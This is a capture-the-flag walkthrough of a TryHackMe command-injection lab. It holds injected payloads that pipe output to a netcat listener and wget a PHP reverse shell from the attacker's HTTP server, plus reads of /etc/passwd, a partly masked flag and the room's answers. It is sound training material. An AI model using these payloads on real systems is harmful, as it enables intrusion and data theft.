Tryhackme : Injection v4



This post is a walkthrough of the OS Command Injection room, which demonstrates OS command injection and explains how to prevent it on your servers. I thought this would be helpful for beginners.


https://tryhackme.com/room/injection


Let's get started by deploying the machine. Since this is a walkthrough machine, we have some guidance for solving the tasks, and there are five tasks in total.



Nmap Scan

nmap -T4 -sT -sV -A -p- 10.10.245.41
Starting Nmap 7.80 ( https://nmap.org ) at 2020-06-10 10:10 IST
Stats: 0:01:11 elapsed; 0 hosts completed (1 up), 1 undergoing Connect Scan
Connect Scan Timing: About 12.41% done; ETC: 10:20 (0:08:14 remaining)
Warning: 10.10.245.41 giving up on port because retransmission cap hit (6).
Nmap scan report for 10.10.245.41
Host is up (0.20s latency).
Not shown: 65516 closed ports
PORT      STATE    SERVICE        VERSION
22/tcp    open     ssh            OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 cc:44:30:82:07:0e:5d:1d:9a:2f:9e:c7:c5:58:78:c8 (RSA)
|   256 73:70:7a:38:45:76:cb:77:ee:bd:a7:a0:b7:33:72:1d (ECDSA)
|_  256 cc:3e:1a:08:c1:40:7a:3a:c4:52:65:3f:64:f0:c9:95 (ED25519)
80/tcp    open     http           Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: !!WIP!! - Directory Search
4210/tcp  filtered vrml-multi-use
7032/tcp  filtered unknown
8235/tcp  filtered unknown
12965/tcp filtered unknown
14320/tcp filtered unknown
15011/tcp filtered unknown
24363/tcp filtered unknown
25876/tcp filtered unknown
27643/tcp filtered unknown
40281/tcp filtered unknown
41894/tcp filtered unknown
43068/tcp filtered unknown
51584/tcp filtered unknown
62332/tcp filtered unknown
62491/tcp filtered unknown
63680/tcp filtered unknown
64394/tcp filtered unknown
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 866.77 seconds

Ports 22 and 80 are open, which means an Apache web server is running on the machine.



Since Task 1 does not require any answer or flag, let's skip it. Task 2 is about command injection and has a description of it (beginners should read it to get some base knowledge).

Blind Command Injection


We saw that it is running an Apache server on Ubuntu; let's look at what it serves.


We have an interesting input field, and the page mentions a directory search. The room already gives us the source code. Looking into it, we are asked to provide a valid user, and the app checks whether that user exists or not. Let's try with www-data and root, which are default users on an Ubuntu server.
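The room's index.php is not reproduced here. As an added example (mine, not the room's code), this shows the lookup pattern the text describes, a submitted username pasted into a shell command that checks /etc/passwd, beside a version that validates the name and never spawns a shell. The passwd excerpt, file path and function names are constructed for the example.

```python
import os
import re
import subprocess
import tempfile

# Constructed /etc/passwd excerpt so the example runs offline; not the room's file.
SAMPLE_PASSWD = (
    "root:x:0:0:root:/root:/bin/bash\n"
    "www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin\n"
)
PASSWD_PATH = os.path.join(tempfile.mkdtemp(), "passwd")
with open(PASSWD_PATH, "w") as fh:
    fh.write(SAMPLE_PASSWD)


def user_exists_vulnerable(username):
    """Hypothetical lookup in the style the room describes: the submitted
    username is pasted, unquoted, into a shell command line, so anything
    after ';' in the input becomes a second command."""
    cmd = f"grep ^{username}: {PASSWD_PATH}"
    proc = subprocess.run(cmd, shell=True, capture_output=True, text=True,
                          stdin=subprocess.DEVNULL)
    # The app itself only reports success/error; the second command's output
    # never reaches the browser, which is why the room calls this blind.
    return proc.returncode == 0, proc.stdout


# Allowlist modelled on the default Debian/Ubuntu adduser NAME_REGEX; none of
# the shell metacharacters (; | & ` $ ( ) newline) can get through it.
USERNAME_RE = re.compile(r"[a-z_][a-z0-9_-]{0,31}")


def user_exists_hardened(username):
    """Same check without a shell: validate, then read the file directly."""
    if not USERNAME_RE.fullmatch(username):
        return False  # reject outright rather than trying to strip characters
    with open(PASSWD_PATH) as fh:
        return any(line.split(":", 1)[0] == username for line in fh)


if __name__ == "__main__":
    print(user_exists_vulnerable("www-data"))
    print(user_exists_vulnerable("root; echo INJECTED #"))  # second command runs
    print(user_exists_hardened("www-data"), user_exists_hardened("root; echo INJECTED #"))
```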



Let's break this input by crafting our own payload: since the app grabs the user from /etc/passwd and verifies it, we can execute a command after the username. Let's try listing the files and sending the output through netcat.


payload: root; ls -la | nc 10.8.19.249 4567

nc -nvlp 4567
listening on [any] 4567 ...
connect to [10.8.19.249] from (UNKNOWN) [10.10.245.41] 57348
total 36
drwxr-x--- 4 www-data www-data 4096 Jun 10 03:26 .
drwxr-xr-x 3 root     root     4096 May 18 15:21 ..
drwxr-x--- 2 www-data www-data 4096 May 21 03:04 css
-rw-r----- 1 www-data www-data   17 May 22 13:14 drpepper.txt
-rw-r----- 1 www-data www-data 1723 May 26 01:52 evilshell.php
-rw-r----- 1 www-data www-data 2200 May 21 03:04 index.php
drwxr-x--- 2 www-data www-data 4096 May 21 03:04 js
-rw-r--r-- 1 www-data www-data 5493 Jun 10 02:52 shell.php
          

We found a suspicious file called evilshell.php; let's check what it can do.


It is a web shell owned by www-data, through which we can execute whatever command we want via the input parameter. Let's use it to get a reverse shell with the help of netcat.


nc -nvlp 4567
listening on [any] 4567 ...
connect to [10.8.19.249] from (UNKNOWN) [10.10.245.41] 57350

But that did not work properly for me: the output was returned to the web server and displayed in the web page. I did not like that, so I decided to upload a PHP reverse shell.

We download a PHP reverse shell locally, serve it with a simple HTTP server (python2 or python3), and use wget on the target to fetch the file:


payload: root; wget http://10.8.19.249:8000/shell.php

python3 -m http.server
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
10.10.245.41 - - [10/Jun/2020 10:40:47] "GET /shell.php HTTP/1.1" 200 -
          

Once the file has downloaded, listen on some port on the attacker machine, send a GET request to shell.php, and BOOM, you get a reverse shell.

nc -nvlp 4567
listening on [any] 4567 ...
connect to [10.8.19.249] from (UNKNOWN) [10.10.245.41] 57354
Linux injection 4.15.0-101-generic #102-Ubuntu SMP Mon May 11 10:07:26 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
 05:12:01 up  2:28,  0 users,  load average: 0.00, 0.00, 0.00
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$

Challenges

#1 Ping the box with 10 packets. What is this command (without IP address)?

; ping -c 10 0


#2 Redirect the box's Linux Kernel Version to a file on the web server. What is the Linux Kernel Version?

uname -a
4.15.0-101


#3 Enter "root" into the input and review the alert. What type of alert do you get?

success


#4 Enter “www-data” into the input and review the alert. What type of alert do you get?

success


#5 Enter your name into the input and review the alert. What type of alert do you get?

Error



Active Command Injection

#1 What strange text file is in the website root directory?

drwxr-x--- 4 www-data www-data 4096 Jun 10 03:26 .
drwxr-xr-x 3 root     root     4096 May 18 15:21 ..
drwxr-x--- 2 www-data www-data 4096 May 21 03:04 css
-rw-r----- 1 www-data www-data   17 May 22 13:14 drpepper.txt
-rw-r----- 1 www-data www-data 1723 May 26 01:52 evilshell.php
-rw-r----- 1 www-data www-data 2200 May 21 03:04 index.php
drwxr-x--- 2 www-data www-data 4096 May 21 03:04 js
-rw-r--r-- 1 www-data www-data 5493 Jun 10 02:52 shell.php
Answer: drpepper.txt

#2 How many non-root/non-service/non-daemon users are there?

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd/netif:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd/resolve:/usr/sbin/nologin
syslog:x:102:106::/home/syslog:/usr/sbin/nologin
messagebus:x:103:107::/nonexistent:/usr/sbin/nologin
_apt:x:104:65534::/nonexistent:/usr/sbin/nologin
lxd:x:105:65534::/var/lib/lxd/:/bin/false
uuidd:x:106:110::/run/uuidd:/usr/sbin/nologin
dnsmasq:x:107:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin
landscape:x:108:112::/var/lib/landscape:/usr/sbin/nologin
pollinate:x:109:1::/var/cache/pollinate:/bin/false
sshd:x:110:65534::/run/sshd:/usr/sbin/nologin
Answer: 0

#3 What user is this app running as?

ps aux | grep apache2
root       942  0.0  1.6 327124  8176 ?        Ss   02:44   0:00 /usr/sbin/apache2 -k start
www-data   949  0.0  2.4 331980 11960 ?        S    02:44   0:00 /usr/sbin/apache2 -k start
www-data   950  0.0  2.1 331972 10624 ?        S    02:44   0:00 /usr/sbin/apache2 -k start
www-data   951  0.0  2.2 331976 11008 ?        S    02:44   0:00 /usr/sbin/apache2 -k start
www-data   952  0.0  2.2 331980 11100 ?        S    02:44   0:00 /usr/sbin/apache2 -k start
www-data   953  0.0  2.1 331980 10768 ?        S    02:44   0:00 /usr/sbin/apache2 -k start
www-data   961  0.0  2.5 331976 12428 ?        S    02:45   0:00 /usr/sbin/apache2 -k start
www-data   966  0.0  2.4 331980 11816 ?        S    02:45   0:00 /usr/sbin/apache2 -k start
www-data   967  0.0  2.3 331980 11388 ?        S    02:45   0:00 /usr/sbin/apache2 -k start
www-data  1843  0.0  2.3 331984 11520 ?        S    03:24   0:00 /usr/sbin/apache2 -k start
www-data  3244  0.0  2.6 331972 12884 ?        S    04:55   0:00 /usr/sbin/apache2 -k start
www-data  3386  0.0  0.2  11464  1036 pts/2    S+   05:16   0:00 grep apache2
Answer: www-data

#4 What is the user’s shell set as?

cat /etc/passwd | grep www-data
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
Answer: /usr/sbin/nologin

#5 What version of Ubuntu is running?

lsb_release -a
No LSB modules are available.
Distributor ID: Ubuntu
Description: Ubuntu 18.04.4 LTS
Release: 18.04
Codename: bionic
Answer: 18.04.4

#6 Print out the MOTD. What favorite beverage is shown?

cat /etc/update-motd.d/00-header
#!/bin/sh
#
#    00-header - create the header of the MOTD
#    Copyright (C) 2009-2010 Canonical Ltd.
#
#    Authors: Dustin Kirkland 
#
#    This program is free software; you can redistribute it and/or modify
#    it under the terms of the GNU General Public License as published by
#    the Free Software Foundation; either version 2 of the License, or
#    (at your option) any later version.
#
#    This program is distributed in the hope that it will be useful,
#    but WITHOUT ANY WARRANTY; without even the implied warranty of
#    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
#    GNU General Public License for more details.
#
#    You should have received a copy of the GNU General Public License along
#    with this program; if not, write to the Free Software Foundation, Inc.,
#    51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.

[ -r /etc/lsb-release ] && . /etc/lsb-release

if [ -z "$DISTRIB_DESCRIPTION" ] && [ -x /usr/bin/lsb_release ]; then
 # Fall back to using the very slow lsb_release utility
 DISTRIB_DESCRIPTION=$(lsb_release -s -d)
fi

printf "Welcome to %s (%s %s %s)\n" "$DISTRIB_DESCRIPTION" "$(uname -o)" "$(uname -r)" "$(uname -m)"
DR PEPPER MAKES THE WORLD TASTE BETTER!
Answer: DR PEPPER

Get the flag

Good work getting this far! You’ve completed the walkthrough, learned about command injection; what it is and how to test for it, and now it’s time to prove what you’ve got! Exploit the vulnerability and get the flag! For this, you can exploit either page. Both are vulnerable.


find / 2>/dev/null | grep flag.txt
/etc/flag.txt
cat /etc/flag.txt
65f**************************4c4

This was a simple and easy room on TryHackMe, but great for beginners learning command injection. Thank you.